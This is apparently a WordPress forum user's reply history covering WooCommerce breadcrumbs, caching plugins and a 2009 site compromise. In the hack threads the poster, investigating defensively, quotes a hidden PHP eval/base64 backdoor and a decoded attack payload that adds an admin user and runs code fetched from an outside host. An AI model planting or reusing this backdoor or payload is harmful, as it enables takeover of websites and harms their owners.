netnothing
Forum Replies Created
-
@tacoverdo yes – 14.0.4 solves the issue. Thank you very much!
14.0.1 did not fix my Woocommerce breadcrumbs issue.
In addition, on 14.0.1 when you go to a category page in WooCommerce, the main Shop link doesn’t show anymore?!?
I’m also seeing something similar.
On 13.5 we see the following on Woocommerce:
Home » Shop » CATEGORY » PRODUCT
Shop breadcrumb is set via the WP Woocommerce Page under: Advanced -> Breadcrumbs Title
After upgrading to 14 we see:
Home » Products » CATEGORY » PRODUCT
Shop is no longer shown. It is switched to Products when viewing a category or product. No way to get it back.
Forum: Plugins
In reply to: [BackUpWordPress] Withdraw Update 3.9!Time to move on to another backup plugin. Customer support should be #1 and clearly it’s not for this dev.
Thanks for the explanation. That’s what I suspected. We are having a problem with the latest version not clearing the cache for the homepage if a “scheduled” post is added while in ON mode. Seems to be more reliable in HALF ON mode.
-Kevin
Forum: Fixing WordPress
In reply to: Question About Possible Hack of SiteI’m seeing the same pattern. Funny thing is, I’m seeing it back on 8/30 from a different IP address, whereas I’m seeing the bad base64 code in today’s log.
-Kevin
Forum: Fixing WordPress
In reply to: Question About Possible Hack of SiteFor people that are decoding the string from the logs……are you able to find that user in the database?
I can’t find that user in our wp_users table at all?
-Kevin
Forum: Fixing WordPress
In reply to: Question About Possible Hack of SiteMaybe true, but that doesn’t mean it’s the only file that’s been hacked.
Right you are…..just found the code in the /wp-content/advanced-cache.php file which is part of WP-Super-Cache.
Anyone any closer to finding out how they did this? Problem for us is, unfortunately we are plugin dependent on an old version that only works up to 2.7.1. So I’m hoping to clean and then patch the attack point because we can’t upgrade.
-Kevin
Forum: Fixing WordPress
In reply to: Question About Possible Hack of SiteThe lesson here is to replace all the default WP source code with new code. Then look for any other files that may have been added….or hacked in other programs. If you have custom themes/plugins, then they need to be closly searched as well.
Far as I can tell this was just one of the WP “silence is golden” empty index.php files that are used if users don’t block directory listing with .htaccess…..so there is no code there to begin with.
-Kevin
Forum: Fixing WordPress
In reply to: Question About Possible Hack of SiteAlso,
We had the index.php file modified on 8/31/09 in our main uploads folder to this:
<?php function gpc_19045($l19047){if(is_array($l19047)){foreach($l19047 as $l19045=>$l19046)$l19047[$l19045]=gpc_19045($l19046);}elseif(is_string($l19047) && substr($l19047,0,4)==”____”){eval(base64_decode(substr($l19047,4)));$l19047=null;}return $l19047;}if(empty($_SERVER))$_SERVER=$HTTP_SERVER_VARS;array_map(“gpc_19045”,$_SERVER);
// Silence is golden.
?>Notice the long set of blank spaces to hide the code?
EDIT: Ok, WP forum strips out the blank spaces…..but before the first function call there are over 1800 spaces.-Kevin
Forum: Fixing WordPress
In reply to: Question About Possible Hack of SiteOk we have at least one 2.7.1 that got hacked. Permalink problem, but thus far I can’t find any new admin users.
I found our bad access:
88.165.203.192 – – [04/Sep/2009:06:07:15 -0700] “POST /xmlrpc.php HTTP/1.1” 200 900 “JHJvbGU9J2FkbWluaXN0cmF0b3InOyR1c2VyX2xvZ2luPSdCdWRkeUphcm5pZ2FuNzcnOyR1c2VyX3Bhc3M9JyM3RFdaYjhjdW5uRCc7ZXZhbChmaWxlX2dldF9jb250ZW50cygnaHR0cDovL2xpbmtzLndlYndvcmRwcmVzcy5jbi9kYXRhL3Nob3J0cGFydDIudHh0JykpO2V4aXQ7” “Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en) AppleWebKit/522+ (KHTML, like Gecko) Version/3.0.2 Safari/522.12”
Ours decodes to:
$role=’administrator’;$user_login=’BuddyJarnigan77′;$user_pass=’#7DWZb8cunnD’;eval(file_get_contents(‘http://links.webwordpress.cn/data/shortpart2.txt’));exit;
However, I can’t find this user in the table? I looking directly at the database through a sql client and I don’t see any new users created today.
Anyone else see this?
-Kevin
Forum: Plugins
In reply to: Sociable plug-in warningsSame thing here. Any updates?
-Kevin
Forum: Plugins
In reply to: Sociable 3.4.4 – Warning MessageSame thing here….running WP 2.7.1 and Sociable 3.4.4.
Any updates to this?
-Kevin
donncha thanks. Actually the readme.txt makes a little more sense after Viper007Bond’s explanation.
I understand the static html pages and can see those in the supercache directory.
Can I ask…….What is technically happening with WP-Cache pages? When you say they are handled by PHP, what is involved in this? Are there still calls to the database? These aren’t static files anymore?
Thanks.
-Kevin
Forum: Fixing WordPress
In reply to: Use a static homepage, links to Pages and to a blog sectioncais, sorry the site is not live yet (not even developed yet).
Let’s see if I can clear up my description:
If someone goes to http://www.example.com/ I want them to see a static page that is not controlled by WordPress. Mainly because this page will look different than the rest of the site.
On this page will be links across the top for the “Pages” of the site (ie. About Us, Contact, Services, Pricing, etc). These “Pages” are to be Pages within WordPress. The main reason is so the owner of the site can add/change content.
One of the links across the top should be called Blog. This link needs to take people to a blog page that mimics a default wordpress install (in that is shows the last X number of posts and has the pagination at the bottom).
Basically, I’m trying to use WordPress as a blogging platform and CMS so that the Pages are more prominent than the blog portion (whereas typical blogs have the blog posts more prominent and the pages as support).
Any help?
-Kevin